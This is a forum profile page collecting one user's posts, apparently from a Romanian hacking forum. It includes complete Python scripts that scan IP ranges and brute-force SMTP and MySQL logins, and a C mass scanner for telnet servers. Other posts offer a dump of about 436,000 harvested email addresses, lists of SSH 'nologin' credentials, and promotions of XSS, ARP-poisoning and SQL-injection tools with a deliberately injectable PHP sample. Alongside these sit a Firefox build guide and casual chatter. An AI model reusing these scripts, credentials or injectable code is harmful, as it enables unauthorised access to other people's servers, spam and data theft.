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Everything posted by Eric

  1. #!usr/bin/python #Smtp Brute Forcer, searches ip_range for hosts using smtp. #http://www.darkc0de.com #d3hydr8[at]gmail[dot]com import threading, time, StringIO, commands, random, sys, smtplib, re, socket from smtplib import SMTP from copy import copy if len(sys.argv) !=4: print "Usage: ./smtpbrute_iprange.py <ip_range> <userlist> <wordlist>" sys.exit(1) try: users = open(sys.argv[2], "r").readlines() except(IOError): print "Error: Check your userlist path\n" sys.exit(1) try: words = open(sys.argv[3], "r").readlines() except(IOError): print "Error: Check your wordlist path\n" sys.exit(1) print "\n\t d3hydr8[at]gmail[dot]com smtpBruteForcer v1.0" print "\t--------------------------------------------------\n" print "[+] Scanning:",sys.argv[1] print "[+] Users Loaded:",len(users) print "[+] Words Loaded:",len(words) wordlist = copy(words) def scan(): iprange = sys.argv[1] ip_list = [] nmap = StringIO.StringIO(commands.getstatusoutput('nmap -P0 '+iprange+' -p 25 | grep open -B 3')[1]).readlines() for tmp in nmap: ipaddr = re.findall("\d*\.\d*\.\d*\.\d*", tmp) if ipaddr: ip_list.append(ipaddr[0]) return ip_list def reloader(): for word in wordlist: words.append(word) def getword(): lock = threading.Lock() lock.acquire() if len(words) != 0: value = random.sample(words, 1) words.remove(value[0]) else: reloader() value = random.sample(words, 1) lock.release() return value[0][:-1] class Workhorse(threading.Thread): def run(self): value = getword() try: print "-"*12 print "User:",user[:-1],"Password:",value smtp = smtplib.SMTP(ip) smtp.login(user[:-1], value) print "\t\nLogin successful:",user, value smtp.quit() work.join() sys.exit(2) except(socket.gaierror, socket.error, socket.herror, smtplib.SMTPException), msg: #print "An error occurred:", msg pass ip_list = scan() print "[+] Hosts Loaded:",len(ip_list),"\n" for ip in ip_list: print "\n\tAttempting BruteForce:",ip,"\n" try: helo = smtplib.SMTP(ip) print helo.helo(), "\n" helo.quit() except(socket.gaierror, socket.error, socket.herror, smtplib.SMTPException): print "Server doesn't support the Helo cmd" for user in users: for i in range(len(words)): if i == 0: reloader() work = Workhorse() work.start() time.sleep(2)
  2. #!usr/bin/python #MySQL Brute Forcer, searches ip_range for hosts using MySQL. #You need the MySQLdb package found here: #http://sourceforge.net/projects/mysql-python #http://www.darkc0de.com #d3hydr8[at]gmail[dot]com import threading, time, StringIO, commands, random, sys, re from copy import copy try: import MySQLdb except(ImportError): print "\nYou need the MySQLdb package found here: http://sourceforge.net/projects/mysql-python\n" sys.exit(1) if len(sys.argv) !=4: print "Usage: ./mysqlbrute_iprange.py <ip_range> <userlist> <wordlist>" sys.exit(1) try: users = open(sys.argv[2], "r").readlines() except(IOError): print "Error: Check your userlist path\n" sys.exit(1) try: words = open(sys.argv[3], "r").readlines() except(IOError): print "Error: Check your wordlist path\n" sys.exit(1) print "\n\t d3hydr8[at]gmail[dot]com MySQLBruteForcer v1.0" print "\t--------------------------------------------------\n" print "[+] Scanning:",sys.argv[1] print "[+] Users Loaded:",len(users) print "[+] Words Loaded:",len(words) wordlist = copy(words) def scan(): iprange = sys.argv[1] ip_list = [] nmap = StringIO.StringIO(commands.getstatusoutput('nmap -P0 '+iprange+' -p 3306 | grep open -B 3')[1]).readlines() for tmp in nmap: ipaddr = re.findall("\d*\.\d*\.\d*\.\d*", tmp) if ipaddr: ip_list.append(ipaddr[0]) return ip_list def reloader(): for word in wordlist: words.append(word) def getword(): lock = threading.Lock() lock.acquire() if len(words) != 0: value = random.sample(words, 1) words.remove(value[0]) else: reloader() value = random.sample(words, 1) lock.release() return value[0][:-1] class Workhorse(threading.Thread): def run(self): value = getword() try: print "-"*12 print "User:",user[:-1],"Password:",value db=MySQLdb.connect(host=ip,user=user,passwd=value) print "\t\nLogin successful:",user, value db.close() work.join() sys.exit(2) except(MySQLdb.Error), msg: #print "An error occurred:", msg pass ip_list = scan() print "[+] Hosts Loaded:",len(ip_list),"\n" for ip in ip_list: print "\n\tAttempting BruteForce:",ip,"\n" for user in users: for i in range(len(words)): if i == 0: reloader() work = Workhorse() work.start() time.sleep(1)
  3. De curiozitate, ce faci tu cu ce am dat eu mai sus ?
  4. O sa postez zilele astea un program asemanators, doar ca isi va lua nologinele din baza de date a siteului unlimited-socks.com. si va fi free o perioada pentru userii rst.
  5. Softu iti scote din ssh ( nologin ) un socks, adica iti face tunelul si iti da socks-ul . : 3155 il pui in orice aplicatie vrei tu ( web / jocuri / proxifier, nimic, moloz) si iesi pe ip-ul ssh-ului(nologinului) Are acelasi principiu ca bitvise.
  6. La ce anume te referi ? Daca cripteaza traficul sau daca programul este criptat? Fi mai explicit te rog.
  7. Scurta descriere: Este un program asemanator bitvise tunnelier doar ca mult mai simplu de utilizat si portabil. Este suportat de orice os care are java instalat. Este prima versiune a acestui tool, asa ca va rog fiti ingaduitori. Astept orice parere ( buna sau rea ) si ce ati vrea sa vedeti, sau sa contina versiunea 2. Download: http://www.filetransfer.ro/Xe6jQm Virustotal: https://www.virustotal.com/file/15b990970ce7ddb32cb52488c66ec012cf5f72f5f99bda2e6090537fb66dd0d2/analysis/1351638789/
  8. Aproximativ 436.000 emailuri scoase din db, apartinand unor firme din ro in proportie de 80% Mai sunt printre ele si alte mailuri valide in genul: georgi_gagicutza@yahoo.com georgi_gagiguta@yahoo.com georgi_gargarita@yahoo.com Download: Download Listafirme for Free | 1gb File Hosting with amazing speed!
  9. US alex:alex: Angeles:California alex:alex: alex:alex: Lake:Michigan alex:alex: alex:alex: alex:alex: ES alex:alex:álaga:Andalucia alex:alex: RU alex:alex: Petersburg:Saint Petersburg City alex:alex: alex:alex: IT alex:alex: alex:alex: alex:alex:ò:Lombardia alex:alex: AU alex:alex: South Wales alex:alex: alex:alex: edit: Daca vreti alte tari va rog sa cereti in acest topic. Am sa incerc sa adaug la 2-3 zile cateva nologine FREE.
  10. /* * Simple & dirty telnetd encryption scanner by Kingcope * Year 2011 * * Compile : gcc telnetscan.c -o telnetscan -lpthread */ #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> #include <string.h> #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <pthread.h> #include <sys/time.h> #include <fcntl.h> #include <errno.h> #define MAX_THREADS 50 #define CONNECT_TIMEOUT 3 // in seconds #define MAX_BUF 100 void *telnet(void *arg) { int sockd; int count; struct sockaddr_in serv_name; unsigned char buf[MAX_BUF]; char ip[256]; char saveip[256]; char request[1024]; char req_enc[6] = "\xff\xfd\x26\xff\xfb\x26"; int status; FILE *f; strcpy(ip, (char*)arg); sockd = socket(AF_INET, SOCK_STREAM, 0); if (sockd == -1) { perror("Socket creation"); return NULL; } serv_name.sin_family = AF_INET; inet_aton(ip, &serv_name.sin_addr); serv_name.sin_port = htons(23); unsigned long iMode = 1; status = connect(sockd, (struct sockaddr*)&serv_name, sizeof(serv_name)); if (status == -1) { close(sockd); return NULL; } count = read(sockd, buf, MAX_BUF); memcpy(request, req_enc, 6); write(sockd, request, 6); count = read(sockd, buf, MAX_BUF); if (buf[0]==0xff&&buf[1]==0xfb&&buf[2]==0x26&&buf[3]==0xff&&buf[4]==0xfd&&buf[5]==0x26) { printf("\n%s supports encryption\n", ip); snprintf(saveip, sizeof(saveip), "%s\n", ip); f = fopen("scan.log", "a"); fputs(saveip, f); fclose(f); close(sockd); return NULL; } close(sockd); return NULL; } void usage(char *argv[]) { printf("%s <startip> <endip>\n", argv[0]); exit(0); } void parseip(char *ip, int *a1, int *a2, int *a3, int *a4) { char *pos,*pos2,*pos3; pos = strchr(ip, '.'); if ((!pos) || (pos-ip > 3)) { printf("Invalid ip.\n"); exit(0); } *pos=0; *a1 = atoi(ip); pos2 = strchr(pos+1, '.'); if ((!pos2) || (pos2-(pos+1) > 3)) { printf("Invalid ip.\n"); exit(0); } *pos2=0; *a2 = atoi(pos+1); pos3 = strchr(pos2+1, '.'); if ((!pos3) || (pos3-(pos2+1) > 3)) { printf("Invalid ip.\n"); exit(0); } *pos3=0; *a3 = atoi(pos2+1); if (strlen(pos3+1) > 3) { printf("Invalid ip\n"); exit(0); } *a4 = atoi(pos3+1); } int main(int argc, char *argv[]) { char *startip; char *endip; int a1,a2,a3,a4; int b1,b2,b3,b4; pthread_t threads[512]; int threads_running[512]; char scanip[256]; int k,k1,k2,k3,k4; printf("telnetd encryption scanner by Kingcope\n"); if (argc != 3) usage(argv); startip = (char*)malloc(strlen(argv[1])+1); if (startip == NULL) { printf("error: malloc()\n"); exit(0); } strcpy(startip, argv[1]); endip = (char*)malloc(strlen(argv[2])+1); if (endip == NULL) { printf("error: malloc()\n"); exit(0); } strcpy(endip, argv[2]); parseip(startip, &a1, &a2, &a3, &a4); parseip(endip, &b1, &b2, &b3, &b4); printf("Starting scan from %d.%d.%d.%d to %d.%d.%d.%d\nSaving hits to scan.log\n", a1, a2, a3, a4, b1, b2, b3, b4); k1=a1; k2=a2; k3=a3; k4=a4; k=0; printf("CURRENT IP: %d.%d.%d.%d\n", k1, k2, k3, k4); fflush(stdout); for( { snprintf(scanip, sizeof(scanip), "%d.%d.%d.%d", k1, k2, k3, k4); threads_running[k] = time(NULL); if (pthread_create( &threads[k], NULL, telnet, (void*) scanip) != 0) { printf("Error: Could not create thread. Done.\n"); exit(0); } usleep(1000); k++; if (k==MAX_THREADS) { int kk; for (kk=0;kk<MAX_THREADS;kk++) { while (threads_running[kk] + CONNECT_TIMEOUT > time(NULL)) { __asm("nop"); } pthread_cancel(threads[kk]); pthread_join(threads[kk], NULL); } for (kk=0;kk<1024;kk++) { close(kk+4); } k=0; printf("CURRENT IP: %d.%d.%d.%d\n", k1, k2, k3, k4); fflush(stdout); } if (k4==b4 && k3==b3 && k2==b2 && k1==b1) { printf("\nscan finished\ndone.\n"); exit(0); } k4++; if (k4 == 256) { k3++; k4=0; } if (k3 == 256) { k2++; k3=0; } if (k2 == 256) { k1++; k2=0; } if (k1 == 256) { printf("\nscan finished\ndone.\n"); exit(0); } } return 0; }
  11. Introduction to Firefox Firefox is a stand-alone browser based on the Mozilla codebase. This package is known to build and work properly using an LFS-7.2 platform. Package Information Download (FTP): ftp://ftp.mozilla.org/pub/mozilla.org/firefox/releases/16.0.1/source/firefox-16.0.1.source.tar.bz2 Download MD5 sum: 78e641c67dc4a40cb3f48fce3e782d41 Download size: 85 MB Estimated disk space required: 994 MB (34 MB installed) (or 647 MB and 4.1 MB if using xulrunner) Estimated build time: 27 SBU (0.4 SBU if using xulrunner) Firefox Dependencies Required alsa-lib-1.0.26 GTK+-2.24.13 Zip-3.0 UnZip-6.0 Recommended yasm-1.2.0 libvpx-v1.1.0 (to allow Firefox to play webm videos). Optional D-Bus Bindings startup-notification-0.12 SQLite- Hunspell: open source spell checking, stemming, morphological analysis and generation under GPL, LGPL or MPL licenses libevent-2.0.20 Doxygen-1.8.2 gnome-vfs-2.24.4 libgnomeui-2.24.5 (for integration with the old version of Gnome) libnotify-0.7.5 NSPR-4.9.2 NSS-3.13.6 Wireless Tools-29 Valgrind Home (only for testing the jemalloc code) Wget-1.14 Xulrunner-16.0.1 User Notes: firefox – BLFS Trac Installation of Firefox There are two major methods for building Firefox. In the standard case, the entire suite of libraries is built and installed. In the other, most of the system is built using the procedures found in Xulrunner-16.0.1. This is advantageous if you are planning to build other related packages such as IcedTea-Web-1.3. With either build method, you need to run the main build procedure below with the appropriate options in the mozconfig file. Then use the appropriate install instructions depending on the chosen build method. The configuration of Firefox is accomplished by creating a mozconfig file containing the desired configuration options. A default mozconfig is created below. To see the entire list of available configuration options (and an abbreviated description of each one), issue ./configure --help. You may also wish to review the entire file and uncomment any other desired options. The commented line for --with-libxul-sdk has an escaped dollar sign - if you have chosed to paste the entries into a mozconfig file in your editor, you do not need the escape, it is only necessary when invoking a subshell in a HERE document. Create the file by issuing the following command: cat > mozconfig << EOF # If you have a multicore machine you can speed up the build by running # several jobs at once, but if you have a single core, delete this line: mk_add_options MOZ_MAKE_FLAGS="-j4" # If you have not installed Yasm, uncomment this option: # ac_add_options --disable-webm # If you have installed DBus-Glib delete this option: ac_add_options --disable-dbus # If you have installed wireless-tools delete this option: ac_add_options --disable-necko-wifi # If you have installed libnotify delete this option: ac_add_options --disable-libnotify # If you have installed xulrunner uncomment these two lines: # ac_add_options --with-system-libxul # ac_add_options --with-libxul-sdk=\$(pkg-config --variable=sdkdir libxul) # Note: The backslash above is to facilitate a paste operation. It # should not appear in the mozconfig file. # Uncomment these if you have installed them: # ac_add_options --enable-startup-notification # ac_add_options --enable-system-hunspell # ac_add_options --enable-system-sqlite # ac_add_options --with-system-libevent # ac_add_options --with-system-libvpx # ac_add_options --with-system-nspr # ac_add_options --with-system-nss mk_add_options MOZ_OBJDIR=@TOPSRCDIR@/firefox-build-dir ac_add_options --enable-official-branding ac_add_options --prefix=/usr # The rest of these options have no effect if you're # building against an already installed xulrunner: ac_add_options --disable-crashreporter ac_add_options --disable-debug ac_add_options --disable-installer ac_add_options --disable-static ac_add_options --disable-tests ac_add_options --disable-updater ac_add_options --enable-shared ac_add_options --enable-system-cairo ac_add_options --enable-system-ffi ac_add_options --with-pthreads ac_add_options --with-system-jpeg ac_add_options --with-system-png ac_add_options --with-system-zlib EOF If you are building a stand-alone firefox with system versions of nspr, nss, or sqlite issue the following command: sed -i 's/\(MOZ_PKG_FATAL_WARNINGS =\).*/\1 0/' \ browser/installer/Makefile.in && Compile Firefox by issuing the following commands: sed -i 's# ""##' browser/base/Makefile.in && make -f client.mk This package does not come with a test suite. If you have not linked Firefox against an installed Xulrunner: make -C firefox-build-dir/browser/installer Now, as the root user, if you have not linked Firefox against an installed Xulrunner, install the package: rm -rf /usr/lib/firefox-16.0.1 && mkdir /usr/lib/firefox-16.0.1 && tar -xvf firefox-build-dir/dist/firefox-16.0.1.en-US.linux-$(uname -m).tar.bz2 \ -C /usr/lib/firefox-16.0.1 --strip-components=1 && ln -sfv ../lib/firefox-16.0.1/firefox /usr/bin && mkdir -pv /usr/lib/mozilla/plugins && ln -sfv ../mozilla/plugins /usr/lib/firefox-16.0.1 && chown -R -v root:root /usr/lib/firefox-16.0.1 If you have linked against an already installed Xulrunner, as the root user: make -C firefox-build-dir install && rm /usr/bin/firefox && cat > /usr/bin/firefox << "HERE_DOC" && #!/bin/bash /usr/lib/xulrunner-16.0.1/xulrunner /usr/lib/firefox-16.0.1/application.ini "${@}" HERE_DOC chmod 755 /usr/bin/firefox && mkdir -pv /usr/lib/mozilla/plugins && ln -sfv ../mozilla/plugins /usr/lib/firefox-16.0.1 NPAPI Headers The above instructions just install the parts you need to run Firefox. If you want to compile gnash-0.8.10, the open source version of Flash, copy some headers that Gnash needs into /usr/include, as the root user: rm -rf /usr/include/npapi && mkdir -v /usr/include/npapi && cp -v dom/plugins/base/*.h /usr/include/npapi Command Explanations sed -i 's/\(MOZ_PKG_FATAL_WARNINGS =\).*/\1 0/' ...: This sed fixes an error in the internal packaging check.. sed -i 's# ""##' browser/base/Makefile.in: This sed removes an unprintable control character from the title bar. make -f client.mk ...: Mozilla products are packaged to allow the use of a configuration file which can be used to pass the configuration settings to the configure command. make uses the client.mk file to get initial configuration and setup parameters. make -C firefox-build-dir/browser/installer: this creates a Firefox tarball similar to the ones you can download from Mozilla. tar -xfv firefox-build-dir/dist ...: This untars Firefox in /usr/lib. The --strip-components=1 option removes the leading 'firefox' directory from the filenames, allowing us to untar it into a versioned directory. make -C firefox-build-dir install: This runs make install in firefox-build-dir. ln -sfv ... /usr/bin/firefox: this puts a symbolic link to the firefox executable in your ${PATH}. mkdir -p /usr/lib/mozilla/plugins: this checks that /usr/lib/mozilla/plugins exists. ln -sv ... /usr/lib/firefox-16.0.1: this makes a symbolic link to /usr/lib/mozilla/plugins. It's not really needed, Firefox checks /usr/lib/mozilla/plugins by default, we make the symbolic link to keep all the plugins installed in one folder. Configuring Firefox If you deleted the --disable-webm option from your mozconfig, your Firefox can play most YouTube videos without the need for the flash plugin. To enable this, go to YouTube and click on 'Join the HTML5 Trial' (needs cookies enabled). If you use a desktop environment like Gnome or KDE you may like to create a firefox.desktop file so that Firefox appears in the panel's menus. If you didn't enable startup-notification in your mozconfig change the StartupNotify line to false. As the root user: mkdir -pv /usr/share/applications && cat > /usr/share/applications/firefox.desktop << "EOF" && [Desktop Entry] Encoding=UTF-8 Type=Application Name=Firefox Comment=Browse The Web Icon=firefox Exec=firefox Categories=Network;GTK;Application;Browser;WebBrowser; StartupNotify=true Terminal=false EOF ln -sfv /usr/lib/firefox-16.0.1/icons/mozicon128.png /usr/share/pixmaps/firefox.png Contents Installed Programs: firefox Installed Libraries: Numerous libraries, browser components, plugins, extensions, and helper modules installed in /usr/lib/firefox-16.0.1. Installed Directories: /usr/include/npapi and /usr/lib/firefox-16.0.1. sursa: Firefox-16.0.1
  12. Din ceea ce scrie in readme a fost testat doar pe mac, pare a fi usor de instalat pe windows cat despre linux habar nu am daca merge, ar trebuii sa pui fisierele in folderul de la firefox . README ______ Report bugs to nishant.dp@gmail.com or http://code.google.com/p/ra2-dom-xss-scanner/issues Installation ------------ Copy the entire "ra2" folder to "/Users/Shared/" Copy the file "ra2@domxssscanner.app" Start FireFox. Type "about:support" (without quotes) in the URL address bar and hit "Enter". Under the "Application Basics" section. Click on "Show in Finder", in the "Profile Folder" row. Open the desired profile folder and paste it in the "extensions" folder. Batch Scanning -------------- After installation, add all the URLs you want to scan in the urls.txt present in "/Users/Shared/ra2/xss/urls.txt" Tested on MacOS X Mountain Lion (10.8.1) Firefox 15.0.1 Daca citesti cu atentie iti cam da mura in gura, doar ca trebuie sa adaptezi. Sincer sa fiu nu sunt sigur daca firefox are compatibile pluginurile pe toate os-urile, adica sa fie un singur plugin pentru toate os-urile dar poti incerca. Nu am absolut nici un linux cu interfata la indemana sa testez. Edit: // http://www.linuxquestions.org/questions/linux-software-2/firefox-plugin-directory-521490/ Se pare ca depinde de distributia de linux pe care o ai, iar din ceea ce am citit il poti pune pe toate os-urile, ideea e sa dibuiesti exact folderul.
  13. Ra.2 - Blackbox DOM-based XSS Scanner is a approach towards finding a solution to the problem of detecting DOM-based Cross-Site Scripting vulnerabilities in Web-Application automatically, effectively and fast. Ra.2 is basically a lighweight Mozilla Firefox Add-on that uses a very simple yet effective and unique approach to detect most DOM-based XSS vulnerabilities, if not all. Being a browser-add on it is a session-aware tool which can scan a web-application that requires authentication. Ra.2 uses custom collected list of XSS vectors which has been heavily modified to be compatible with its scanning technology. The add-on also implements basic browser intrumentation to simulate a human interaction to trigger some hard to detect DOM-based XSS conditions. Features False positive free by design: Vulnerable URLs are saved in DB, if and only if, our payload is executed successfully by the browser. Hence marked exploitable. If isn't false-positive, it's a bug! Report us Large collection of injection vectors, includes “modified” R’Snake’s vectors as well. Supports transforming Unicode characters for testing content aware application. Automatically handles JavaScript obfuscation/compression, as it relies on native interpreter. Fast and light-weight. Pretty easy learning curve. Point-n-Click. DOWNLOAD: https://code.google.com/p/ra2-dom-xss-scanner/downloads/list
  14. ARPwner was released at BlackHat USA 2012 by Nicolas Trippar. It is a tool to do arp poisoning and dns poisoning attacks, with a simple gui and a plugin system to do filtering of the information gathered, also has a implementation of sslstrip and is coded 100% in python, so you can modify on your needs. DOWNLOAD: https://github.com/ntrippar/ARPwner
  15. An easy to use SQL injection tool for retrieving database informations from a distant server. You can discuss about jSQL Injection on the discussion group. jSQL Injection features: GET, POST, header, cookie methods normal, error based, blind, time based algorithms automatic best algorithms detection data retrieving progression proxy setting evasion For now supports MySQL. Running injection requires the distant server url and the name of the parameter to inject. If you know an injection should work but the jSQL tool doesn't access the database, you can inform me by email or use the discussion group. For a local test, you can use the following PHP source code with the URL : mysql_connect("localhost", "root", ""); mysql_select_db("my_own_database"); $result = mysql_query("SELECT * FROM my_own_table where my_own_field = {$_GET['lib']}") # time based or die( mysql_error() ); # error based if(mysql_num_rows($result)!==0) echo" true "; # blind while ($row = mysql_fetch_array($result, MYSQL_NUM)) echo join(',',$row); # normal jsql-injection - jSQL Injection is a java tool for automatic database injection. - Google Project Hosting
  16. eu sunt de acord, daca este si ilbr22 atunci avem o intelegere, iti dau pm imediat! multumesc
  17. vreau sa il cumpar eu, cum facem ? nu as vrea sa iti dau banii si sa fugi cu ei, eventual daca se poate sa facem printr-un mod/admin tranzactia si sa imi dai sfaturile necesare la inceput pentru administrarea siteului, tin sa precizez ca am deja cont pe site-ul tau si am cam vazut potentialul site-ului. cum facem ?
  18. hhh stf cum reaq se blocheaza ma cand tu ai 1 gb ram ? :@?
  19. 4n4rchyl04d3r cool pe ma-ta ..du-te ba si lasa-ne meriti x3 ban
  20. tare poti sa tragi oricand daca ai ambitie ..cu ambitie reusesti tot ce altii cred ca ii imposibil
  21. Eric

    Tricou RST

    hhh , si tu porti sapca ,a ? ..io cu encoded locuim in ele ,asa`i encoded ? :@ :@ :@
  22. Eric

    Tricou RST

    un post scris de un om fara cap , ce vrei sa ne arati aici ca ai aflat credit card = cc ori sa faci un post in plus ?
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